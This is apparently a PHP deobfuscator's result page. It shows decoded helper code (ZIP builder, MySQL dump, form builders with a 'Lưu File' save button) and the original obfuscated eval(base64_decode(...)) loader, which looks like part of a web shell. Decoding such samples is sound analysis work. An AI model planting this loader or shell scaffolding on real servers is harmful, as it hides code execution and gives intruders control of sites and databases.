$zdata = substr(substr($zdata,0,strlen($zdata) -4),2);
$fr .= pack('V',$crc);
$fr .= pack('V',$c_len);
$fr .= pack('V',$unc_len);
$fr .= pack('v',strlen($name));
$fr .= pack('v',0);
$fr .= $name;
$fr .= $zdata;
$fr .= pack('V',$crc);
$fr .= pack('V',$c_len);
$fr .= pack('V',$unc_len);
$this ->datasec[] = $fr;
$new_offset = strlen(implode('',$this->datasec));
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V',$crc);
$cdrec .= pack('V',$c_len);
$cdrec .= pack('V',$unc_len);
$cdrec .= pack('v',strlen($name) );
$cdrec .= pack('v',0 );
$cdrec .= pack('v',0 );
$cdrec .= pack('v',0 );
$cdrec .= pack('v',0 );
$cdrec .= pack('V',32 );
$cdrec .= pack('V',$this ->old_offset );
$this ->old_offset = $new_offset;
$cdrec .= $name;
$this ->ctrl_dir[] = $cdrec;
}
function file() {
$data    = implode('',$this ->datasec);
$ctrldir = implode('',$this ->ctrl_dir);
return $data .$ctrldir .$this ->eof_ctrl_dir .pack('v',sizeof($this ->ctrl_dir)) .pack('v',sizeof($this ->ctrl_dir)) .pack('V',strlen($ctrldir)) .pack('V',strlen($data)) ."\x00\x00";
}
}
function sqldumptable($table,$fp=0) {
$tabledump = "DROP TABLE IF EXISTS $table;\n";
$tabledump .= "CREATE TABLE $table (\n";
$firstfield=1;
$fields = q("SHOW FIELDS FROM $table");
while ($field = mysql_fetch_array($fields)) {
if (!$firstfield) {
$tabledump .= ",\n";
}else {
$firstfield=0;
}
$tabledump .= "   $field[Field] $field[Type]";
if (!empty($field["Default"])) {
$tabledump .= " DEFAULT '$field[Default]'";
}
if ($field['Null'] != "YES") {
$tabledump .= " NOT NULL";
}
if ($field['Extra'] != "") {
$tabledump .= " $field[Extra]";
}
}
fr($fields);
$keys = q("SHOW KEYS FROM $table");
while ($key = mysql_fetch_array($keys)) {
$kname=$key['Key_name'];
if ($kname != "PRIMARY"&&$key['Non_unique'] == 0) {
$kname="UNIQUE|$kname";
}
if(!is_array($index[$kname])) {
$index[$kname] = array();
}
$index[$kname][] = $key['Column_name'];
}
fr($keys);
while(list($kname,$columns) = @each($index)) {
$tabledump .= ",\n";
$colnames=implode($columns,",");
if ($kname == "PRIMARY") {
$tabledump .= "   PRIMARY KEY ($colnames)";
}else {
if (substr($kname,0,6) == "UNIQUE") {
$kname=substr($kname,7);
}
$tabledump .= "   KEY $kname ($colnames)";
}
}
$tabledump .= "\n);\n\n";
if ($fp) {
fwrite($fp,$tabledump);
}else {
echo $tabledump;
}
$rows = q("SELECT * FROM $table");
$numfields = mysql_num_fields($rows);
while ($row = mysql_fetch_array($rows)) {
$tabledump = "INSERT INTO $table VALUES(";
$fieldcounter=-1;
$firstfield=1;
while (++$fieldcounter<$numfields) {
if (!$firstfield) {
$tabledump.=", ";
}else {
$firstfield=0;
}
if (!isset($row[$fieldcounter])) {
$tabledump .= "NULL";
}else {
$tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
}
}
$tabledump .= ");\n";
if ($fp) {
fwrite($fp,$tabledump);
}else {
echo $tabledump;
}
}
fr($rows);
if ($fp) {
fwrite($fp,"\n");
}else {
echo "\n";
}
}
function ue($str){
return urlencode($str);
}
function p($str){
echo $str."\n";
}
function tbhead() {
p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
}
function tbfoot(){
p('</table>');
}
function makehide($name,$value=''){
p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
}
function makeinput($arg = array()){
$arg['size'] = $arg['size'] >0 ?"size=\"$arg[size]\"": "size=\"100\"";
$arg['extra'] = $arg['extra'] ?$arg['extra'] : '';
!$arg['type'] &&$arg['type'] = 'text';
$arg['title'] = $arg['title'] ?$arg['title'].'<br />': '';
$arg['class'] = $arg['class'] ?$arg['class'] : 'input';
if ($arg['newline']) {
p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
}else {
p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
}
}
function makeselect($arg = array()){
if ($arg['onchange']) {
$onchange = 'onchange="'.$arg['onchange'].'"';
}
$arg['title'] = $arg['title'] ?$arg['title'] : '';
if ($arg['newline']) p('<p>');
p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
if (is_array($arg['option'])) {
foreach ($arg['option'] as $key=>$value) {
if ($arg['selected']==$key) {
p("<option value=\"$key\" selected>$value</option>");
}else {
p("<option value=\"$key\">$value</option>");
}
}
}
p("</select>");
if ($arg['newline']) p('</p>');
}
function formhead($arg = array()) {
!$arg['method'] &&$arg['method'] = 'post';
!$arg['action'] &&$arg['action'] = $self;
$arg['target'] = $arg['target'] ?"target=\"$arg[target]\"": '';
!$arg['name'] &&$arg['name'] = 'form1';
p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
if ($arg['title']) {
p('<h2>'.$arg['title'].' &raquo;</h2>');
}
}
function maketext($arg = array()){
!$arg['cols'] &&$arg['cols'] = 100;
!$arg['rows'] &&$arg['rows'] = 25;
$arg['title'] = $arg['title'] ?$arg['title'].'<br />': '';
p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
}
function formfooter($name = ''){
!$name &&$name = 'submit';
p('<p><input class="bt" name="'.$name.'" id=\"'.$name.'\" type="submit" value="L&#432;u File"></p>');
p('</form>');
}
function formfoot(){
p('</form>');
}
function pr($a) {
echo '<pre>';
print_r($a);
echo '</pre>';
};echo '
';
?>

Did this file decode correctly?

Original Code

<?php $_F=__FILE__;$_X='';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>        

Function Calls

strtr 2
ereg_replace 2
base64_decode 4

Variables

$_F index.php
$_R 0
$_X 0

Stats

MD5 4f52759c0bc3e47736018e0403396e55
Eval Count 4
Decode Time 6464 ms